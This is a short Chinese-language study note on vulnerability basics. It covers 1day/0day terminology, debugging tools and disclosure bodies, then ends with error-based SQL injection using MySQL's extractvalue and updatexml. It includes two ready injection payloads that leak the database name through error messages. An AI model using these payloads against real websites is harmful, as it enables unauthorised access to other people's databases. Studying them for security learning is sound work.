一、小知识
有时把攻击这种刚刚被patch过的漏洞称为1day攻击。(patch发布后1天,叫做1day,5天叫做5day,未发patch统称0day)
漏洞的测试过程:漏洞挖掘、漏洞分析、漏洞利用
二、工具:
ollydbg动态调试工具
IDA pro静态反汇编工具
三、公布漏洞的权威机构
CVE(Common Vulnerabiliities and Expsures) http://cve.mitre.com/
CERT(Computer Emergency Response Team)计算机应急响应组
微软的安全中心(Black Tuesday)
适用有回显的注入:
1、格式:extractvalue(目标xml文档,xml路径)
xml路径格式/xx/xx如果换成其他格式即会报错,并返回错误的内容,比如把/改成\符号
extractvalue(1,concat(0x5c,(select database())));
2、格式:UPDATEXML (XML_document, XPath_string, new_value);
XPath的格式错误会爆出错误,并返回信息
and updatexml(1,concat('^',(database()),'^'),1)